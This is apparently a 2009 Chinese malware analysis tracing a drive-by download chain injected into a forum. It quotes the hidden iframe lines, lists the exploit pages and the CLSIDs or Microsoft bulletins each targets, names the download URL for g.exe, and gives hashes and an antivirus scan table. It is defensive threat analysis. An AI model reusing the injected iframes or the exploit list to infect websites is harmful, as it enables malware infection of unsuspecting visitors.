某论坛挂马Worm.Win32.Autorun.eyh
论坛网页包含代码:
/---
<iframe width='0' height='0' src='hxxp://www.5**4*z**c.cn/1**7aq/q.js'></iframe>
---/
hxxp://www.5**4*z**c.cn/1**7aq/q.js
输出代码:
/---
<IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></IFRAME>
hxxp://m**.sf*s3**wws.cn/03/x4.htm
包含代码:
/---
<iframe src=google.htm width=100 height=0></Iframe>
---/
hxxp://m**.sf*s3**wws.cn/03/google.htm
采用了一种先前没见过的加密方法,开头一段代码为:
/---
<hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>
---/
其功能是:检测浏览器软件类型,如果是IE浏览器,则显示ie.swf,否则显示ff.swf;然后输出代码:
/---
<iframe src=all.htm width=100 height=0></iframe>
---/
hxxp://m**.sf*s3**wws.cn/03/all.htm
采用了相同的加密方法:
用<iframe>引入下列网页,利用漏洞下载hxxp://d1.csygg.com/01/g.exe:
1.htm
利用MS-06014漏洞
kdosn.htm
利用Qvod Player 播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞
kc.htm
利用Baidu工具条(cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9})漏洞下载hxxp://d1.csygg.com/01/Baidu.cab
newlz.htm
利用联众(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞
s.htm
利用新浪(Downloader.DLoader.1,clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)漏洞
office.htm
利用MS Office(snpvw.Snapshot Viewer Control.1)漏洞
bf.htm
利用暴风影音(MPS.StormPlayer,)漏洞
cx.htm
利用超星阅览器(Pdg2)漏洞
uu.htm
UUSEE网络电视(UUUPGRADE.UUUpgradeCtrl.1)漏洞
2.htm
利用联众世界(HanGamePluginCn18.HanGamePluginCn18.1)漏洞
3.htm
4.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞
0.htm
利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞
5.htm
利用MS09-002 漏洞
文件说明符 : D:/test/g.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2009-3-23 22:38:20
修改时间 : 2009-3-23 22:38:20
大小 : 25696 字节 25.96 KB
MD5 : cae3e537b9d4495d31af6c360cb31dee
SHA1: 76877278EF76318E4A025ADC9B9FEC8CF8C7D30C
CRC32: 3ee9304b
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
a-squared | 4.0.0.101 | 2009.03.23 | Win32.Warezov!IK |
AhnLab-V3 | 5.0.0.2 | 2009.03.23 | Packed/Upack |
AntiVir | 7.9.0.120 | 2009.03.23 | TR/Crypt.UPKM.Gen |
Authentium | 5.1.2.4 | 2009.03.23 | W32/SYStroj.N.gen!Eldorado |
Avast | 4.8.1335.0 | 2009.03.23 | - |
AVG | 8.5.0.283 | 2009.03.23 | Rootkit-Agent.BN |
BitDefender | 7.2 | 2009.03.23 | Generic.Malware.SP!BPk!Tkg.BE60B47D |
CAT-QuickHeal | 10.00 | 2009.03.23 | - |
ClamAV | 0.94.1 | 2009.03.23 | Worm.Mytob-73 |
Comodo | 1082 | 2009.03.23 | - |
DrWeb | 4.44.0.09170 | 2009.03.23 | DLOADER.Trojan |
eSafe | 7.0.17.0 | 2009.03.23 | Win32.Looked.gen |
eTrust-Vet | 31.6.6412 | 2009.03.23 | - |
F-Prot | 4.4.4.56 | 2009.03.23 | W32/SYStroj.N.gen!Eldorado |
F-Secure | 8.0.14470.0 | 2009.03.23 | Trojan.Win32.Agent2.gcy |
Fortinet | 3.117.0.0 | 2009.03.23 | - |
GData | 19 | 2009.03.23 | Generic.Malware.SP!BPk!Tkg.BE60B47D |
Ikarus | T3.1.1.48.0 | 2009.03.23 | Win32.Warezov |
K7AntiVirus | 7.10.678 | 2009.03.21 | Generic.Packed.Upack-1 |
Kaspersky | 7.0.0.125 | 2009.03.23 | Trojan.Win32.Agent2.gcy |
McAfee | 5561 | 2009.03.22 | - |
McAfee+Artemis | 5561 | 2009.03.22 | New Malware.f |
McAfee-GW-Edition | 6.7.6 | 2009.03.23 | Trojan.Crypt.UPKM.Gen |
Microsoft | 1.4502 | 2009.03.23 | - |
NOD32 | 3953 | 2009.03.21 | - |
Norman | 6.00.06 | 2009.03.23 | W32/Suspicious_U.gen |
nProtect | 2009.1.8.0 | 2009.03.23 | - |
Panda | 10.0.0.10 | 2009.03.22 | - |
PCTools | 4.4.2.0 | 2009.03.23 | Packed/Upack |
Prevx1 | V2 | 2009.03.23 | High Risk Worm |
Rising | 21.22.02.00 | 2009.03.23 | Worm.Win32.Autorun.eyh |
Sophos | 4.39.0 | 2009.03.23 | Mal/Packer |
Sunbelt | 3.2.1858.2 | 2009.03.22 | - |
Symantec | 1.4.4.12 | 2009.03.23 | Trojan.KillAV |
TheHacker | 6.3.3.4.287 | 2009.03.23 | - |
TrendMicro | 8.700.0.1004 | 2009.03.23 | Cryp_Upack |
VBA32 | 3.12.10.1 | 2009.03.23 | - |
ViRobot | 2009.3.23.1660 | 2009.03.23 | - |
VirusBuster | 4.6.5.0 | 2009.03.22 | Packed/Upack |
附加信息 | |||
File size: 25696 bytes | |||
MD5...: cae3e537b9d4495d31af6c360cb31dee | |||
SHA1..: 76877278ef76318e4a025adc9b9fec8cf8c7d30c | |||
SHA256: 84eb838fb8ef8c3579f1f6121e06e78a6de2a545597e6326d6bea5b82538969c | |||
SHA512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca538659bb970550<BR>9e01a6f8ee94e4f44ee5a8603bf90b8c733ad7d0c88ca4267a18d27178feab0d | |||
ssdeep: 384:B5JocoN1ffccInU9mgG0Hy+QVMf6mFJt6UnHQJNX8Cw02igc8TElAlVr7l:B<BR>4co7YkJvxFJC7n2igPTElAvr<BR> | |||
PEiD..: Upack 0.24 - 0.27 beta / 0.28 alpha -> Dwing | |||
TrID..: File type identification<BR>DOS Executable Generic (100.0%) | |||
PEInfo: PE Structure information<BR><BR>( base data )<BR>entrypointaddress.: 0x1efe3<BR>timedatestamp.....: 0x0 (Thu Jan 01 00:00:00 1970)<BR>machinetype.......: 0x14c (I386)<BR><BR>( 2 sections )<BR>name viradd virsiz rawdsiz ntrpy md5<BR>.Upack 0x1000 0x18000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e<BR>.rsrc 0x19000 0xe000 0x6260 7.98 88e69c0ef43413739c008ef9e7337308<BR><BR>( 1 imports ) <BR>> KERNEL32.DLL: LoadLibraryA, GetProcAddress<BR><BR>( 0 exports ) <BR> | |||
Prevx info: <a href='http://info.prevx.com/aboutprogramtext.asp?PX5=2480BFFB6039EC60640200DBB987A400C935BB45' target='_blank'>http://info.prevx.com/aboutprogramtext.asp?PX5=2480BFFB6039EC60640200DBB987A400C935BB45</a> | |||
packers (Kaspersky): UPack | |||
packers (Authentium): embedded | |||
packers (F-Prot): embedded |